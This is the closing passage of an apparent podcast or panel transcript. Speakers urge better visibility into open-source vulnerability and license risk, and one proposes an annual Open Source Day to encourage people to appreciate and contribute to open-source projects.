I would just say the biggest thing for open source and security combined is getting that visibility and informing yourself, whether through tooling or otherwise. I think that's one of the bigger problems: a lot of times people just don't know; they're missing information, they don't have visibility. And I think that's the biggest problem we need to solve. There are people, too, who just don't care about security, and I don't know how to solve that problem. I alluded to that a little bit with the audit, check-a-box kind of mentality. Some people just check a box; they don't actually care about security. They have a tool they don't even use, it's purposely misconfigured, they don't want to know what vulnerabilities they have. I don't know how to solve that. But for people who actually care about security: figure out how to inform yourself, how to get visibility into your risk, whether it's vulnerabilities or license risk or otherwise.
Kadi
Ilkka, bring us home.
Ilkka
All right, well, I agree with every statement made by my honorable friends who went before me. The only other thing I'd add to all of this is: open source is here to stay. By and large, the reason we have the businesses we have today is because of all of these projects out there, whether they're professional or otherwise, and they're here to stay, right? And the best thing we can really do is dedicate some of our time, even if it's just 10 minutes, to appreciating them. So, a little bit of a hard pitch for you: we're going to designate February 3rd of every year, going forward, as Open Source Day. And one of the things we're going to do on our part is encourage every one of our employees, everybody who works with us, to do exactly what I just said. Just spend 10 minutes, educate yourself, spend some time, and if you can contribute back, even better. Because that's the way we're going to get this stuff on the right track. Everybody needs to appreciate how much of it is out there and how much we use it, and also show a little appreciation back to the projects, because they really appreciate it too. So yeah, that's all I had.
Kadi
Ilkka, Brian, and Adam, thank you so much for taking the time to talk with me and Omar today about what's trending in open source. Stay tuned: in two weeks we'll be back with another conversation.